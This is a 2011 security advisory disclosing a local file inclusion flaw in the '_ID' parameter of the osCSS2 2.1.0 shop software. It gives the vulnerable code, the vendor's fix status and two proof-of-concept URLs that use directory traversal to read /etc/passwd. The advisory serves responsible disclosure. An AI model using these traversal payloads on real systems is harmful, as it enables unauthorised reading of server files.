Advisory: osCSS2 "_ID" parameter Local file inclusion Advisory ID: SSCHADV2011-034 Author: Stefan Schurtz Affected Software: Successfully tested on osCSS2 2.1.0 (latest version) Vendor URL: http://oscss.org/ Vendor Status: Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ========================== Vulnerability Description ========================== osCSS2 2.1.0 "_ID" parameter is prone to a LFI vulnerability ========================== Vulnerable code ========================== //.htaccess RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING} //content.php require($page->path_gabarit()); // includes/classes/page.php public function pile_file_lang($path_file){ global $lang; if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file; if(!in_array($path_file,(array)$this->PileFileLang)) include_once($path_file); } ================== PoC-Exploit ================== http:///catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd http:///catalog/content.php?_ID=../../../../../../../../../../../etc/passwd ========= Solution ========= Fixed in svn branche 2.1.0 and reported in develop version 2.1.1 ==================== Disclosure Timeline ==================== 08-Nov-2011 - informed vendor 08-Nov-2011 - release date of this security advisory 08-Nov-2011 - fixed by vendor ======== Credits ======== Vulnerability found and advisory written by Stefan Schurtz. =========== References =========== http://oscss.org/ http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html http://dev.oscss.org/task/892 http://www.rul3z.de/advisories/SSCHADV2011-034.txt